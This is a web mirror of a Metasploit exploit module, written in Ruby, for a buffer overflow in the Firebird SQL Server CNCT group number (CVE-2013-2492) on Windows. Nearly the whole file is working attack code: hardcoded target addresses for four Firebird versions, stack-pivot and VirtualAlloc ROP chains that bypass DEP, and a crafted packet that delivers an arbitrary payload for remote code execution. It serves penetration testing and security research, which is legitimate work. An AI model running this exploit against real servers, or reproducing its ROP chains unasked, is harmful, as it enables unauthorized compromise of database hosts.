Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/fb_cnct_group.rb
19718 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
include Msf::Exploit::Remote::Tcp
9
10
def initialize
11
super(
12
'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
13
'Description' => %q{
14
This module exploits a vulnerability in Firebird SQL Server. A specially
15
crafted packet can be sent which will overwrite a pointer allowing the attacker to
16
control where data is read from. Shortly, following the controlled read, the
17
pointer is called resulting in code execution.
18
19
The vulnerability exists with a group number extracted from the CNCT information,
20
which is sent by the client, and whose size is not properly checked.
21
22
This module uses an existing call to memcpy, just prior to the vulnerable code,
23
which allows a small amount of data to be written to the stack. A two-phases
24
stack pivot allows to execute the ROP chain which ultimately is used to execute
25
VirtualAlloc and bypass DEP.
26
},
27
'Author' => 'Spencer McIntyre',
28
'Arch' => ARCH_X86,
29
'Platform' => 'win',
30
'References' => [
31
[ 'CVE', '2013-2492' ],
32
[ 'OSVDB', '91044' ]
33
],
34
'DefaultOptions' => {
35
'EXITFUNC' => 'seh'
36
},
37
'Payload' => {
38
# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
39
'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
40
'Space' => 400,
41
'BadChars' => "\x00\x0a\x0d"
42
},
43
'Targets' => [
44
# pivots are pointers to stack pivots of size 0x28
45
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
46
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
47
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
48
[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
49
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
50
],
51
'DefaultTarget' => 0,
52
'Privileged' => true,
53
'DisclosureDate' => 'Jan 31 2013',
54
'Notes' => {
55
'Stability' => [ CRASH_SERVICE_RESTARTS ],
56
},
57
)
58
59
register_options([Opt::RPORT(3050)])
60
end
61
62
def check
63
begin
64
connect
65
rescue
66
vprint_error("Unable to get a connection")
67
return Exploit::CheckCode::Unknown
68
end
69
70
filename = "C:\\#{rand_text_alpha(12)}.fdb"
71
username = rand_text_alpha(7)
72
73
check_data = ""
74
check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
75
check_data << "\x00\x00\x00\x13"
76
check_data << filename
77
check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
78
check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
79
check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
80
check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
81
check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
82
check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
83
check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
84
check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
85
check_data << "\x00\x00\x00\x08"
86
87
sock.put(check_data)
88
data = sock.recv(16)
89
disconnect
90
91
opcode = data.unpack("N*")[0]
92
if opcode == 3 # Accept
93
return Exploit::CheckCode::Detected
94
end
95
96
return Exploit::CheckCode::Safe
97
end
98
99
def stack_pivot_rop_chain
100
case target.name
101
when 'Windows FB 2.5.2.26539'
102
rop_chain = [
103
0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]
104
0x0059ffeb, # POP EBP # RETN [fbserver.exe]
105
0x0000153c, # 0x0000153c-> ebp
106
0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
107
0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
108
].pack("V*")
109
when 'Windows FB 2.5.1.26351'
110
rop_chain = [
111
0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]
112
0x0059650b, # POP EBP # RETN [fbserver.exe]
113
0x0000153c, # 0x0000153c-> ebp
114
0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
115
0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
116
].pack("V*")
117
when 'Windows FB 2.1.5.18496'
118
rop_chain = [
119
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
120
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
121
0x000001c0, # 0x000001c0-> ecx
122
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
123
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
124
].pack("V*")
125
when 'Windows FB 2.1.4.18393'
126
rop_chain = [
127
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
128
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
129
0x000001c0, # 0x000001c0-> ecx
130
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
131
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
132
].pack("V*")
133
when 'Debug'
134
rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
135
end
136
return rop_chain
137
end
138
139
def final_rop_chain
140
# all rop chains in here created with mona.py, thanks corelan!
141
case target.name
142
when 'Windows FB 2.5.2.26539'
143
rop_chain = [
144
0x4a831344, # POP ECX # RETN [icuuc30.dll]
145
0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
146
0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
147
0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]
148
0x00431905, # POP EBP # RETN [fbserver.exe]
149
0x00401932, # & push esp # ret [fbserver.exe]
150
0x4a844ac0, # POP EBX # RETN [icuuc30.dll]
151
0x00001000, # 0x00001000-> ebx
152
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
153
0x00001000, # 0x00001000-> edx
154
0x005dae9e, # POP ECX # RETN [fbserver.exe]
155
0x00000040, # 0x00000040-> ecx
156
0x0057a822, # POP EDI # RETN [fbserver.exe]
157
0x005b0384, # RETN (ROP NOP) [fbserver.exe]
158
0x0046f8c3, # POP EAX # RETN [fbserver.exe]
159
0x90909090, # nop
160
0x00586002, # PUSHAD # RETN [fbserver.exe]
161
].pack("V*")
162
when 'Windows FB 2.5.1.26351'
163
rop_chain = [
164
0x00656472, # POP ECX # RETN [fbserver.exe]
165
0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
166
0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
167
0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]
168
0x0041d1ae, # POP EBP # RETN [fbserver.exe]
169
0x0040917f, # & call esp [fbserver.exe]
170
0x4a8589c0, # POP EBX # RETN [icuuc30.dll]
171
0x00001000, # 0x00001000-> ebx
172
0x4a864cc3, # POP EDX # RETN [icuuc30.dll]
173
0x00001000, # 0x00001000-> edx
174
0x0064ef59, # POP ECX # RETN [fbserver.exe]
175
0x00000040, # 0x00000040-> ecx
176
0x005979fa, # POP EDI # RETN [fbserver.exe]
177
0x00424a50, # RETN (ROP NOP) [fbserver.exe]
178
0x4a86052d, # POP EAX # RETN [icuuc30.dll]
179
0x90909090, # nop
180
0x005835f2, # PUSHAD # RETN [fbserver.exe]
181
].pack("V*")
182
when 'Windows FB 2.1.5.18496'
183
rop_chain = [
184
0x005763d5, # POP EAX # RETN [fbserver.exe]
185
0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
186
0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
187
0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]
188
0x004e695a, # POP EBP # RETN [fbserver.exe]
189
0x004d9e6d, # & jmp esp [fbserver.exe]
190
0x4a828650, # POP EBX # RETN [icuuc30.dll]
191
0x00001000, # 0x00001000-> ebx
192
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
193
0x00001000, # 0x00001000-> edx
194
0x00590328, # POP ECX # RETN [fbserver.exe]
195
0x00000040, # 0x00000040-> ecx
196
0x4a8573a1, # POP EDI # RETN [icuuc30.dll]
197
0x0042ba8c, # RETN (ROP NOP) [fbserver.exe]
198
0x00577605, # POP EAX # RETN [fbserver.exe]
199
0x90909090, # nop
200
0x004530ce, # PUSHAD # RETN [fbserver.exe]
201
].pack("V*")
202
when 'Windows FB 2.1.4.18393'
203
rop_chain = [
204
0x4a843429, # POP ECX # RETN [icuuc30.dll]
205
0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
206
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
207
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
208
0x004279c0, # POP EBP # RETN [fbserver.exe]
209
0x0040747d, # & call esp [fbserver.exe]
210
0x004ebef1, # POP EBX # RETN [fbserver.exe]
211
0x00001000, # 0x00001000-> ebx
212
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
213
0x00001000, # 0x00001000-> edx
214
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
215
0x00000040, # 0x00000040-> ecx
216
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
217
0x00423b82, # RETN (ROP NOP) [fbserver.exe]
218
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
219
0x90909090, # nop
220
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
221
].pack("V*")
222
when 'Debug'
223
rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
224
end
225
return rop_chain
226
end
227
228
def exploit
229
connect
230
231
rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")
232
233
# this data gets written to the stack via memcpy, no more than 32 bytes can be written
234
overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
235
overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
236
overwrite_and_rop_chain << stack_pivot_rop_chain
237
238
filename = "C:\\#{rand_text_alpha(13)}.fdb"
239
evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
240
evil_data << "\x00\x00\x00\x14"
241
evil_data << filename
242
evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
243
evil_data << "\x05\x20"
244
evil_data << overwrite_and_rop_chain
245
evil_data << "\x15\x6c\x6f\x63\x61\x6c"
246
evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
247
evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
248
evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
249
evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
250
evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
251
evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
252
evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
253
evil_data << rop_nop_sled
254
evil_data << final_rop_chain
255
evil_data << payload.encoded
256
257
print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
258
sock.put(evil_data)
259
260
disconnect
261
end
262
end
263
264